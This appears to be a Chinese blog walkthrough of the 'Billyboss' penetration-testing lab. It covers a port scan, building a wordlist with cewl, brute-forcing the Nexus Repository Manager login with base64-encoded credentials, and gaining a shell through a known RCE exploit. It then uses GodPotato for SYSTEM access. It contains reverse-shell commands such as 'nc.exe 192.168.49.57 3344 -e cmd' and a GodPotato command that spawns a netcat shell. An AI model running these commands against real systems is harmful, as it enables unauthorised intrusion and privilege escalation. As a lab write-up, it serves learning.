当前位置: 首页 > news >正文

靶场(十九)--靶场体会小白分享--Billyboss

 开始简单的端口扫描,发现看似端口很多其实有趣的就那么几个,所以无需担心

PORT      STATE  SERVICE       VERSION
21/tcp    open   ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open   http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
5040/tcp  open   unknown
7680/tcp  closed pando-pub
8081/tcp  open   http          Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1903 - 21H1
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-05-10T09:35:13
|_  start_date: N/A

 然后我们去看一下80端口服务,发现好像有上传类似的东西,但是查询exp无类似的东西产出,所以暂时先放弃

然后就是去看8081端口,发现有登录口,并且还给出了这个组件的版本号

那必须先去看一下这个版本以下有没有什么exp,经过查询发现果然有一个远控的exp文件

查看这个exp利用方法。发现需要账户和密码才能执行,那这就不得不去搞一下票据了

我们通过cewl爬取该网页,看看能不能组出一个票据,这里的--lowercase是使输出的对象全部小写,这样我们就得到了一个专属字典

这里我写了个脚本用于将字典所有对象进行简单的base64编码,算是秀一下肌肉,当然要是不无聊的人可以直接去burpsuit爆破时候加上base64编码的规则即可

#!/usr/bin/env bash
input="input.txt"
output="output.txt"
while IFS= read -r line; do# -n 不输出结尾换行,base64 默认每 76 字符换行,-w0 关闭换行echo -n "$line" | base64 -w0echo                        # 给每条编码结果补一个换行
done <"$input" >"$output"

 然后这里防止有人找不到添加规则地方,我直接给贴出来,大家看一下就行,注意将两个payload爆破的位置都加上该条规则哟

经过简单的爆破我们也是成功获得登录票据,不过是经过编码的票据

经过解码我们成功获得登录票据nexus:nexus

去8081页面进行简单登录确认一下,成功登录

这个时候将登录票据扔上去即可,然后这里我将会给你两种获得shell的方法,大家看着来就行

第一种:直接使用msfvenom构造exe后门,然后上传即可,然后用这条命令执行一下,要不然马子可运行不起来

cmd.exe /c b.exe

这一块儿是确认了该exp可运行

 这个时候我们也是在执行完上述命令后拿到了shell

第二种:我们上传nc.exe执行文件,然后利用反弹shell的命令即可

nc.exe 192.168.49.57 3344 -e cmd

 然后在windows主机依旧运行我们的老朋友winpeas,成功看到可利用的特权

果断查看net版本去,确认用一下godpotato哪个版本,一般来说大家直接用net4版本就行,我这是小心一点以防万一

这里大家也是可以看到goodpotato版本其实也挺多的,所以看一下还是有必要的

然后再上传一个nc.exe用于反弹shell

GodPotato-NET4.exe -cmd "nc.exe 192.168.49.57 1234 -e cmd.exe"

 这里也是看到烂土豆成功运行起来了

然后我们提前做好一个接收shell的命令,用于接受高权限shell,至于为啥要加rlwrap,因为是真的好用,大家可以试试我就不多说了

rlwrap nc -lnvp 1234

 这里也是成功拿到system权限了,完美结束

结尾:

好久没发文章了,原先一直在忙一些其他事就耽搁了,也是自己懒,不过后续要开始日更了,还望大家多多支持,我尽量做全网最细的靶场文章输出者。

工具链接:

Release V1.20 · BeichenDream/GodPotato

GitHub - int0x33/nc.exe: Netcat for windows 32/64 bit

peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

http://www.lqws.cn/news/183907.html

相关文章:

  • echarts 用散点图实现象限图
  • MySQL账号权限管理指南:安全创建账户与精细授权技巧
  • 文件对话框
  • 如何理解 IP 数据报中的 TTL?
  • 关于事务的简介
  • python打卡训练营打卡记录day46
  • 【数据结构】_排序
  • 基于IDIG-GAN的小样本电机轴承故障诊断
  • vue-20(Vuex 状态管理的最佳实践)
  • K-Means颜色变卦和渐变色
  • GAN模式奔溃的探讨论文综述(一)
  • 使用 XState 状态机打造英语单词学习界面(demo)
  • 电子电气架构 --- 什么是功能架构?
  • 基于vue框架的独居老人上门护理小程序的设计r322q(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • MySQL全文索引
  • MiniExcel模板填充Excel导出
  • MySQL用户和授权
  • Excel 模拟分析之单变量求解简单应用
  • <2>-MySQL库的操作
  • daz3d + PBRSkin (MDL)+ SSS
  • 全面解析各类VPN技术:GRE、IPsec、L2TP、SSL与MPLS VPN对比
  • 边缘计算网关提升水产养殖尾水处理的远程运维效率
  • Nestjs框架: nestjs-schedule模块注册流程,源码解析与定时备份数据库
  • 智能终端与边缘计算按章复习
  • 多模态+空间智能:考拉悠然以AI+智慧灯杆,点亮城市治理新方式
  • Git 操作
  • 学习 React【Plan - June - Week 1】
  • 智能化弱电工程项目管理培训
  • 掌握子网划分:优化IP分配与管理
  • 使用React+ant Table 实现 表格无限循环滚动播放